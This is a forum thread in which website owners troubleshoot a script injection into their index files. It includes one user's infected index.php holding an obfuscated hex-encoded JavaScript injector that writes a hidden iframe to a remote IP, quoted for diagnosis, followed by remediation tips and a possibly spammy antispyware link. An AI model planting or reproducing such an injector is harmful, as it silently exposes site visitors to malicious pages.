advanced xp defender

Well I just replaced the index.php with a backup and it went away but I don’t think it’ll be gone for long because I have no idea how it got there.

The problem is not with your wp version or anything… it just happened on a few of our drupal based sites and also a custom coded asp site – we are guessing it has something to do with our ftp info being shared. we’re trying multiple things and will keep you guys posted as well. Please hit us up if any of you find the issue. – Thanks alot [Danish]

guys, thanks for discussing this problem online. i have the same problem. it has come to my attention that it only poped-up when i was currently browsing my site or when i was about to leave.

just to make sure, i’ve used AntiVir, Malwarebytes’ Anti-Malware and Spybot to check but they found nothing.

so, here’s the idea to trace, how about we compare the version of wordpress and active plugins we used?

here’s mine:
Wordpress 2.5.1
Calendar 2.0
cforms 8.5.1
Exec-PHP 4.7
GetWeather 1.2.1
Image Counter 1.0
My Link Order 2.5.1
NextGEN Gallery 0.96
Pagebar2 2.20
pageMash 1.1.3
Ryans Suckerfish WordPress Dropdown Menu 1.6.6
Search Hilite 1.5
Simple Archive Generator 3.2
Simple Cache 1.0
TinyMCE Advanced 3.0.1
Truncate Title 1.0
WP-Highslide 1.28
WP-Print 2.30
WP-UserOnline 2.30

regards,
kalapacengkir

a little update guys..

i found that it changed 4 files (on online server),
\public_html\index.php
\public_html\wp-admin\index.php
\public_html\wp-content\index.html
\public_html\wp-includes\index.html
by inserting some scripts.

this is my changed index.php

<?php
/* Short and sweet */
define(‘WP_USE_THEMES’, true);
require(‘./wp-blog-header.php’);
?><script>
<!–
var d=document,kol=561;
function O10H485A55AFF19D2(H485A55AFF21B6){ var H485A55AFF25B0 = 16; return( parseInt(H485A55AFF21B6,H485A55AFF25B0));}function H485A55AFF2DA8(H485A55AFF31A5){ var H485A55AFF359E=”;for(H485A55AFF3999=0; H485A55AFF3999<H485A55AFF31A5.length; H485A55AFF3999+=2){ H485A55AFF359E += ( String.fromCharCode (O10H485A55AFF19D2(H485A55AFF31A5.substr(H485A55AFF3999, 2))));}return H485A55AFF359E;} document.write(H485A55AFF2DA8(‘3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3337393532292B2766333434395C272077696474683D353933206865696768743D3634207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E’));
//–>
</script>

regards,
kalapacengkir

It’s not just exclusive to WordPress. I uploaded HTML files and it still appeared on them. I think it just ruins your whole server and adds that script to your files.

I’ve been struggling with this one too, but might(!) have solved it.

Couple of days ago this popped up on my custom coded php website. I’m running on a windows server and integrated into my site are 2 copies of wordpress and 1 copy of phpBB. The only WordPress plugin running was akismet.

It seems to mainly infect files (see code in post above) with the prefix index, regardless of the extension. However, it did appear in login.php of phpbb.

Initially I thought this was an injection attack. So I removed all the hacked code from the infected files and upgraded to latest version of wordpress and phpBB.

We also have a custom form that uses a formmail script. I tightened up the validation on all the fields, and restricted the entry for fields to no more that 35 characters.

I thought this has solved it, until the next morning when it reappeared!

I then upgraded the formmail script, deleted any old files via FTP, changed ftp passwords and removed any other FTP users.

I also ran a spyware scanner on our server… Which is the key bit…
It picked up 2 trojans one of them being ‘advanced xp defender’.

So far (fingers crossed) we haven’t been re-infected.

I suggest that if you are having this problem that you:

• Remove all malicious code from infected files
• Upgrade to the latest version of wordpress/ other open source apps
• Change FTP passwords
• Upgrade plugins
• Disable plugins that use forms on the front end
• Delete any old files on your server
• Ensure any custom forms use validation and the latest scripts
• Get your host to perform a virus/spyware scan on their server

The spyware app I used was Spyware doctor from PCtools.

Hope this helps.

@rofenstein
thanks a lot, it’s crystal clear.

it’s been 2 days since i tried to fix mine, no pop-up anymore.

actually i’d removed that script once before, but pop-up kept showing. then i remembered that i’d used cracked ftp client! having that in mind, i threw the old one, switched to filezilla, removed that script and then changed my ftp password.

as i found out (via googling) that even a hand-made and also a 2-years-safe site had been infected, i guess what we’ve uploaded (cms) is not suspected anymore. now only 2 left, uploading process, and the server itself.

i guess we’ll find out shortly what the real problem is. for now, i recommend you to
– try to change ftp client
– remove script from infected file, and then
– change ftp password

can’t wait to hear news from you guys..

hope this helps, too.

Thanks for the help I’m in the process of fixing it now but my site has been labeled as dangerous by google ??

May I ask how you scanned you server for spyware?

Skaterkee, we have our own dedicated server, which means access like a normal computer. If you’re on shared hosting -contact your host to perform a scan.

That’ll take two weeks knowing hostgator.

Do you know if there’s a way to check wordpress’s database for abnormalities?

God sakes, my host went off on one and deleted everything off my account.

you can read my story here.

https://forums.digitalpoint.com/showthread.php?t=899445

here is my story

https://forums.digitalpoint.com/showthread.php?t=899445

The best antispyware can be found here:

https://codefusionlab.co.cc/15-incredible-free-anti-spyware-software-reviewed/